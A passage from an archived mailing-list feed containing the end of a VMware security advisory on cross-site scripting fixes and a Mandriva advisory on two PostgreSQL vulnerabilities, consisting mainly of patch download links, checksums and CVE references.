&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Stage Manager &amp;nbsp;any &amp;nbsp; &amp;nbsp; &amp;nbsp; any &amp;nbsp; &amp;nbsp; &amp;nbsp;Lab Manager 4.0.1
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Note: The remediation provided by WebWorks.com is not applicable
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;to VMware products.
&lt;br&gt;&lt;br&gt;4. Solution
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Please review the patch/release notes for your product and version
&lt;br&gt;&amp;nbsp; &amp;nbsp;and verify the md5sum of your downloaded file.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;VMware vCenter Server 4 Update 1
&lt;br&gt;&amp;nbsp; &amp;nbsp;--------------------------------
&lt;br&gt;&amp;nbsp; &amp;nbsp;Version &amp;nbsp; &amp;nbsp; &amp;nbsp;4.0 Update 1
&lt;br&gt;&amp;nbsp; &amp;nbsp;Build Number 208156
&lt;br&gt;&amp;nbsp; &amp;nbsp;Release Date 2009/11/19
&lt;br&gt;&amp;nbsp; &amp;nbsp;Type &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Product Binaries
&lt;br&gt;&amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://downloads.vmware.com/download/download.do?downloadGroup=VC40U1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.vmware.com/download/download.do?downloadGroup=VC40U1&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;VMware vCenter Server 4 and modules
&lt;br&gt;&amp;nbsp; &amp;nbsp;File size: 1.8 GB
&lt;br&gt;&amp;nbsp; &amp;nbsp;File type: .iso
&lt;br&gt;&amp;nbsp; &amp;nbsp;MD5SUM: 057d55b32eb27fe5f3e01bc8d3df3bc5
&lt;br&gt;&amp;nbsp; &amp;nbsp;SHA1SUM: c90134418c2e4d3d6637d8bee44261300ad95ec1
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;VMware vCenter Server 4 and modules
&lt;br&gt;&amp;nbsp; &amp;nbsp;File size: 1.5 GB
&lt;br&gt;&amp;nbsp; &amp;nbsp;File type: .zip
&lt;br&gt;&amp;nbsp; &amp;nbsp;MD5SUM: f843d9c19795eb3bc5a77f5c545468a8
&lt;br&gt;&amp;nbsp; &amp;nbsp;SHA1SUM: 9a7abd8e70bd983151e2ee40e1b3931525c4480c
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;VMware vSphere Client and Host Update Utility
&lt;br&gt;&amp;nbsp; &amp;nbsp;File size: 113.8 MB
&lt;br&gt;&amp;nbsp; &amp;nbsp;File type: .exe
&lt;br&gt;&amp;nbsp; &amp;nbsp;MD5SUM: 6cc6b2c958e7e9529c284e48dfae22a9
&lt;br&gt;&amp;nbsp; &amp;nbsp;SHA1SUM: f4c19c63a75d93cffc57b170066358160788c959
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;VMware vCenter Converter BootCD
&lt;br&gt;&amp;nbsp; &amp;nbsp;File size: 98.8 MB
&lt;br&gt;&amp;nbsp; &amp;nbsp;File type: .zip
&lt;br&gt;&amp;nbsp; &amp;nbsp;MD5SUM: 3df94eb0e93de76b0389132ada2a3799
&lt;br&gt;&amp;nbsp; &amp;nbsp;SHA1SUM: 5d7c04e4f9f8ae25adc8de5963fefd8a4c92464c
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;VMware vCenter Converter CLI (Linux)
&lt;br&gt;&amp;nbsp; &amp;nbsp;File size: 36.9 MB
&lt;br&gt;&amp;nbsp; &amp;nbsp;File type: .tar.gz
&lt;br&gt;&amp;nbsp; &amp;nbsp;MD5SUM: 3766097563936ba5e03e87e898f6bd48
&lt;br&gt;&amp;nbsp; &amp;nbsp;SHA1SUM: 36d485bdb5eb279296ce8c8523df04bfb12a2cb4
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;nbsp; &amp;nbsp;ESX 4.0
&lt;br&gt;&amp;nbsp; &amp;nbsp;-------
&lt;br&gt;&amp;nbsp; &amp;nbsp;ESX400-200911223-UG (Update 1a)
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&lt;a href=&quot;https://hostupdate.vmware.com/software/VUM/OFFLINE/release-166-20091202-254&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://hostupdate.vmware.com/software/VUM/OFFLINE/release-166-20091202-254&lt;/a&gt;&lt;br&gt;879/ESX-4.0.0-update01a.zip
&lt;br&gt;&amp;nbsp; &amp;nbsp;md5sum: 99c1fcafbf0ca105ce73840d686e9914
&lt;br&gt;&amp;nbsp; &amp;nbsp;sha1sum: aa8a23416271bc28b6b8f6bdbe00045e36314ebb
&lt;br&gt;&amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://kb.vmware.com/kb/1014842&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://kb.vmware.com/kb/1014842&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;To install an individual bulletin use esxupdate with the -b option.
&lt;br&gt;&amp;nbsp; &amp;nbsp;esxupdate --bundle=ESX-4.0.0-update01.zip -b ESX400-200911223-UG
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;VMware Server 2.0.2
&lt;br&gt;&amp;nbsp; &amp;nbsp;-------------------
&lt;br&gt;&amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://kb.vmware.com/kb/1016594&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://kb.vmware.com/kb/1016594&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Stage Manager
&lt;br&gt;&amp;nbsp; &amp;nbsp;-------------
&lt;br&gt;&amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://www.vmware.com/products/sm/faq.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.vmware.com/products/sm/faq.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Lab Manager 4.0.1
&lt;br&gt;&amp;nbsp; &amp;nbsp;-----------------
&lt;br&gt;&amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://downloads.vmware.com/download/download.do?downloadGroup=VLM401&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.vmware.com/download/download.do?downloadGroup=VLM401&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;md5sum: b4d8f5637eaea59f028eafe62d0366ab
&lt;br&gt;&amp;nbsp; &amp;nbsp;sha1sum: a437726b45dce0a72fb5cbd3996a6d6f84e6c8df
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&lt;a href=&quot;http://www.vmware.com/support/labmanager40/doc/releasenotes_labmanager401.h&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.vmware.com/support/labmanager40/doc/releasenotes_labmanager401.h&lt;/a&gt;&lt;br&gt;tml
&lt;br&gt;&lt;br&gt;5. References
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://www.webworks.com/Security/2009-0001&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.webworks.com/Security/2009-0001&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;CVE numbers
&lt;br&gt;&amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3731&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3731&lt;/a&gt;&lt;br&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;6. Change log
&lt;br&gt;&lt;br&gt;2009-12-15 &amp;nbsp;VMSA-2009-0017
&lt;br&gt;Initial security advisory after publication of information by third
&lt;br&gt;party vendor, WebWorks.com, on 2009-12-15.
&lt;br&gt;&lt;br&gt;- -----------------------------------------------------------------------
&lt;br&gt;7. Contact
&lt;br&gt;&lt;br&gt;E-mail list for product security notifications and announcements:
&lt;br&gt;&lt;a href=&quot;http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce&lt;/a&gt;&lt;br&gt;&lt;br&gt;This Security Advisory is posted to the following lists:
&lt;br&gt;&lt;br&gt;&amp;nbsp; * security-announce at lists.vmware.com
&lt;br&gt;&amp;nbsp; * bugtraq at securityfocus.com
&lt;br&gt;&amp;nbsp; * full-disclosure at lists.grok.org.uk
&lt;br&gt;&lt;br&gt;E-mail: &amp;nbsp;security at vmware.com
&lt;br&gt;PGP key at: &lt;a href=&quot;http://kb.vmware.com/kb/1055&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://kb.vmware.com/kb/1055&lt;/a&gt;&lt;br&gt;&lt;br&gt;VMware Security Center
&lt;br&gt;&lt;a href=&quot;http://www.vmware.com/security&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.vmware.com/security&lt;/a&gt;&lt;br&gt;&lt;br&gt;VMware security response policy
&lt;br&gt;&lt;a href=&quot;http://www.vmware.com/support/policies/security_response.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.vmware.com/support/policies/security_response.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;General support life cycle policy
&lt;br&gt;&lt;a href=&quot;http://www.vmware.com/support/policies/eos.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.vmware.com/support/policies/eos.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;VMware Infrastructure support life cycle policy
&lt;br&gt;&lt;a href=&quot;http://www.vmware.com/support/policies/eos_vi.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.vmware.com/support/policies/eos_vi.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;Copyright 2009 VMware Inc. &amp;nbsp;All rights reserved.
&lt;br&gt;&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: PGP Desktop 9.8.3 (Build 4028)
&lt;br&gt;Charset: utf-8
&lt;br&gt;&lt;br&gt;wj8DBQFLJ9Z2S2KysvBH1xkRAiiOAJ4+TWKnhkLYDiDargvqosRU6RHn1ACeJtXe
&lt;br&gt;oEsepbtYQRxE45xLZgJnaAQ=
&lt;br&gt;=F9Pg
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/VMSA-2009-0017-VMware-vCenter%2C-ESX-patch-and-vCenter-Lab-Manager-releases-address-cross-site-scripting-issues-tp26799884p26799884.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26799665</id>
	<title>[ MDVSA-2009:333 ] postgresql</title>
	<published>2009-12-15T10:27:01Z</published>
	<updated>2009-12-15T10:27:01Z</updated>
	<author>
		<name>security-22</name>
	</author>
	<content type="html">&lt;br&gt;-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux Security Advisory &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MDVSA-2009:333
&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://www.mandriva.com/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mandriva.com/security/&lt;/a&gt;&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Package : postgresql
&lt;br&gt;&amp;nbsp;Date &amp;nbsp; &amp;nbsp;: December 15, 2009
&lt;br&gt;&amp;nbsp;Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0,
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Enterprise Server 5.0
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Problem Description:
&lt;br&gt;&lt;br&gt;&amp;nbsp;Multiple vulnerabilities was discovered and corrected in postgresql:
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;nbsp;NULL Bytes in SSL Certificates can be used to falsify client or server
&lt;br&gt;&amp;nbsp;authentication. This only affects users who have SSL enabled, perform
&lt;br&gt;&amp;nbsp;certificate name validation or client certificate authentication,
&lt;br&gt;&amp;nbsp;and where the Certificate Authority (CA) has been tricked into
&lt;br&gt;&amp;nbsp;issuing invalid certificates. The use of a CA that can be trusted to
&lt;br&gt;&amp;nbsp;always issue valid certificates is recommended to ensure you are not
&lt;br&gt;&amp;nbsp;vulnerable to this issue (CVE-2009-4034).
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;nbsp;Privilege escalation via changing session state in an index
&lt;br&gt;&amp;nbsp;function. This closes a corner case related to vulnerabilities
&lt;br&gt;&amp;nbsp;CVE-2009-3230 and CVE-2007-6600 (CVE-2009-4136).
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;nbsp;Packages for 2008.0 are being provided due to extended support for
&lt;br&gt;&amp;nbsp;Corporate products.
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;nbsp;This update provides a solution to these vulnerabilities.
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;References:
&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4034&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4034&lt;/a&gt;&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4136&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4136&lt;/a&gt;&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://www.postgresql.org/support/security&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.postgresql.org/support/security&lt;/a&gt;&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Updated Packages:
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2008.0:
&lt;br&gt;&amp;nbsp;7a4134b7ab1675be4c53ff6b4922d7e0 &amp;nbsp;2008.0/i586/libecpg5-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;b8fe1351d19899fbca1a67929b0b4be7 &amp;nbsp;2008.0/i586/libecpg-devel-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;e86a98de348ba90bc6a1f16f02daa6e1 &amp;nbsp;2008.0/i586/libpq5-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;551363cff118bee0b87dd827dddce669 &amp;nbsp;2008.0/i586/libpq-devel-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;ef3c1b9a831fedf1399f8b72cd65f748 &amp;nbsp;2008.0/i586/postgresql-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;d308631e61cd6236e40827b78c9c2951 &amp;nbsp;2008.0/i586/postgresql8.2-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;f8e97d697f69e43dc4bb2a96e64600cd &amp;nbsp;2008.0/i586/postgresql8.2-contrib-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;863015525b015c812f963a2af63fc7dd &amp;nbsp;2008.0/i586/postgresql8.2-devel-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;6340e0530e254732d654d8f6211d5198 &amp;nbsp;2008.0/i586/postgresql8.2-docs-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;e098dee5477edb0b7549b65ddb440cb5 &amp;nbsp;2008.0/i586/postgresql8.2-pl-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;05cda82443737a12c7c8c3622e762618 &amp;nbsp;2008.0/i586/postgresql8.2-plperl-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;6a66bc2cc80538a4db3e44ca97740a7f &amp;nbsp;2008.0/i586/postgresql8.2-plpgsql-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;d01866d6fa8d18865e8f47744d0053bd &amp;nbsp;2008.0/i586/postgresql8.2-plpython-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;0e250c776673c8595ed4f57194ceff15 &amp;nbsp;2008.0/i586/postgresql8.2-pltcl-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;f69196c2af80f25abaae6cdb5273a985 &amp;nbsp;2008.0/i586/postgresql8.2-server-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;5c96b2bdfdb5f4b23280de184d76bb4c &amp;nbsp;2008.0/i586/postgresql8.2-test-8.2.15-0.1mdv2008.0.i586.rpm
&lt;br&gt;&amp;nbsp;6c203c33bef69b8f676d1acd782d3526 &amp;nbsp;2008.0/i586/postgresql-devel-8.2.15-0.1mdv2008.0.i586.rpm 
&lt;br&gt;&amp;nbsp;37b86e7869ce8ef7621eb5f2fbeb9804 &amp;nbsp;2008.0/SRPMS/postgresql8.2-8.2.15-0.1mdv2008.0.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2008.0/X86_64:
&lt;br&gt;&amp;nbsp;ef654ee6768a32df7021cb7c1b95151d &amp;nbsp;2008.0/x86_64/lib64ecpg5-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;4272c2616fce89a650e102effb3e2427 &amp;nbsp;2008.0/x86_64/lib64ecpg-devel-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;a45cc8104b4758913384375c6f9d993b &amp;nbsp;2008.0/x86_64/lib64pq5-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;a5beab729e5e4c04374f44b8ed0e7c0d &amp;nbsp;2008.0/x86_64/lib64pq-devel-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;bc9a43e16b3fe38c26011f76e6e796ea &amp;nbsp;2008.0/x86_64/postgresql-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;632cc2bd4f2d099de6f18cc5a4ed28b9 &amp;nbsp;2008.0/x86_64/postgresql8.2-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;da76130aeaec4d962904ed0c2c566c63 &amp;nbsp;2008.0/x86_64/postgresql8.2-contrib-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;9061e32e63cc8dfc68a393dc986b6b92 &amp;nbsp;2008.0/x86_64/postgresql8.2-devel-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;2d88f5b268d6661771fd76eccbca7f82 &amp;nbsp;2008.0/x86_64/postgresql8.2-docs-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;46a1f1beb87d1a3618470b5a1427b53d &amp;nbsp;2008.0/x86_64/postgresql8.2-pl-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;a8126282c514a3b22736c6bf2d3ca570 &amp;nbsp;2008.0/x86_64/postgresql8.2-plperl-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;5aada115ff9cd3c44cd9032d88bd93c4 &amp;nbsp;2008.0/x86_64/postgresql8.2-plpgsql-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;4c9433b70a16300a304ee04b3aeb7abe &amp;nbsp;2008.0/x86_64/postgresql8.2-plpython-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;cf01e27ebed1d7541c7dfe9fe7eaec20 &amp;nbsp;2008.0/x86_64/postgresql8.2-pltcl-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;16fe157d591066b6c7bd12ef79c78972 &amp;nbsp;2008.0/x86_64/postgresql8.2-server-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;c5b58224e6becb9334cd555747fd040e &amp;nbsp;2008.0/x86_64/postgresql8.2-test-8.2.15-0.1mdv2008.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;0e826718d8fe8571618ffdff6304b9d9 &amp;nbsp;2008.0/x86_64/postgresql-devel-8.2.15-0.1mdv2008.0.x86_64.rpm 
&lt;br&gt;&amp;nbsp;37b86e7869ce8ef7621eb5f2fbeb9804 &amp;nbsp;2008.0/SRPMS/postgresql8.2-8.2.15-0.1mdv2008.0.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2009.0:
&lt;br&gt;&amp;nbsp;eb4c7ac210259c34ce96873fa11cdd7b &amp;nbsp;2009.0/i586/libecpg8.3_6-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;ea79f082d51e575072e22e3f37705e76 &amp;nbsp;2009.0/i586/libpq8.3_5-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;21dda67f89a7291aa530bdc0b04b3893 &amp;nbsp;2009.0/i586/postgresql8.3-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;09d1a7d4bcad3b754772e03bfdd85768 &amp;nbsp;2009.0/i586/postgresql8.3-contrib-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;ec004d65e57abb94a1c40ebd0e8b0a24 &amp;nbsp;2009.0/i586/postgresql8.3-devel-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;cae8230c899fd71fd28fc3baaa983e95 &amp;nbsp;2009.0/i586/postgresql8.3-docs-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;e9a46436f40e44e2b4757b6ee2db2dc3 &amp;nbsp;2009.0/i586/postgresql8.3-pl-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;edc0dcc12a27a2166f8e14f147f8540d &amp;nbsp;2009.0/i586/postgresql8.3-plperl-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;1c8b6afc908d4e0037085b2b275b0893 &amp;nbsp;2009.0/i586/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;f0a4b90047b26f6de9c0c5475ede00e8 &amp;nbsp;2009.0/i586/postgresql8.3-plpython-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;1bbd1b65ed0b65a62963eaccb8008666 &amp;nbsp;2009.0/i586/postgresql8.3-pltcl-8.3.9-0.1mdv2009.0.i586.rpm
&lt;br&gt;&amp;nbsp;27124329934314f3f73571e83e5fdaf3 &amp;nbsp;2009.0/i586/postgresql8.3-server-8.3.9-0.1mdv2009.0.i586.rpm 
&lt;br&gt;&amp;nbsp;9af04397316050caeeb767c2e53db8da &amp;nbsp;2009.0/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.0.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2009.0/X86_64:
&lt;br&gt;&amp;nbsp;6aa7262c7041f8fb039a8031965a6a71 &amp;nbsp;2009.0/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;61af7c606839a7fff0ff56991dfd7021 &amp;nbsp;2009.0/x86_64/lib64pq8.3_5-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;2ff4745b162e6b4234862b1b2fcd315f &amp;nbsp;2009.0/x86_64/postgresql8.3-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;50d9eaffaf04beea769d22e058a1f2a8 &amp;nbsp;2009.0/x86_64/postgresql8.3-contrib-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;d9fe796fce569179e8e99ae74a63af76 &amp;nbsp;2009.0/x86_64/postgresql8.3-devel-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;980a800e9ac2a0890d24ae0e843fd6e0 &amp;nbsp;2009.0/x86_64/postgresql8.3-docs-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;27334694d9da6e19904c8198d7f6ef43 &amp;nbsp;2009.0/x86_64/postgresql8.3-pl-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;68f2566b2de77da452d4b8043cf8a0de &amp;nbsp;2009.0/x86_64/postgresql8.3-plperl-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;31c3643e58947d76207345d8e82a6483 &amp;nbsp;2009.0/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;8e342cf436ed4bd6ea61244bca980054 &amp;nbsp;2009.0/x86_64/postgresql8.3-plpython-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;30ba385a932cf752cfd85dd3a0833c40 &amp;nbsp;2009.0/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdv2009.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;e1253c9933f47db51ecd7edc825a703e &amp;nbsp;2009.0/x86_64/postgresql8.3-server-8.3.9-0.1mdv2009.0.x86_64.rpm 
&lt;br&gt;&amp;nbsp;9af04397316050caeeb767c2e53db8da &amp;nbsp;2009.0/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.0.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2009.1:
&lt;br&gt;&amp;nbsp;91a80a39b17253f9321f325979afff81 &amp;nbsp;2009.1/i586/libecpg8.3_6-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;7b27f7064a9b75d50d54e3d782ccea54 &amp;nbsp;2009.1/i586/libpq8.3_5-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;62da0a6d0030c98fd608a33fb123456c &amp;nbsp;2009.1/i586/postgresql8.3-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;7c7dede7142fd2e3ed2ebdb3c519b623 &amp;nbsp;2009.1/i586/postgresql8.3-contrib-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;345e475a35916f7416d4f8b0bf75436b &amp;nbsp;2009.1/i586/postgresql8.3-devel-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;97a70a0872a839f83a2739eaed6607a9 &amp;nbsp;2009.1/i586/postgresql8.3-docs-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;0eed7e9ebefdddcaf27e42d33629dabf &amp;nbsp;2009.1/i586/postgresql8.3-pl-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;61952d53ebee9a18a5cf9a10988c4fa3 &amp;nbsp;2009.1/i586/postgresql8.3-plperl-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;9cdd01198d4d25ef569cc081c411c050 &amp;nbsp;2009.1/i586/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;7b9ba830df3a61827eab05cfada3f09b &amp;nbsp;2009.1/i586/postgresql8.3-plpython-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;42fb3e9486162d383bc67d24eb613b1f &amp;nbsp;2009.1/i586/postgresql8.3-pltcl-8.3.9-0.1mdv2009.1.i586.rpm
&lt;br&gt;&amp;nbsp;db31dcac659eed1a48ee714125c61e78 &amp;nbsp;2009.1/i586/postgresql8.3-server-8.3.9-0.1mdv2009.1.i586.rpm 
&lt;br&gt;&amp;nbsp;be8198d19ff2854fcdb5bde0e1654fbf &amp;nbsp;2009.1/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.1.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2009.1/X86_64:
&lt;br&gt;&amp;nbsp;c803bc340e21af79f5745df0fee8aead &amp;nbsp;2009.1/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdv2009.1.x86_64.rpm
&lt;br&gt;&amp;nbsp;616b2b6f79a848fe57410af986c81bda &amp;nbsp;2009.1/x86_64/lib64pq8.3_5-8.3.9-0.1mdv2009.1.x86_64.rpm
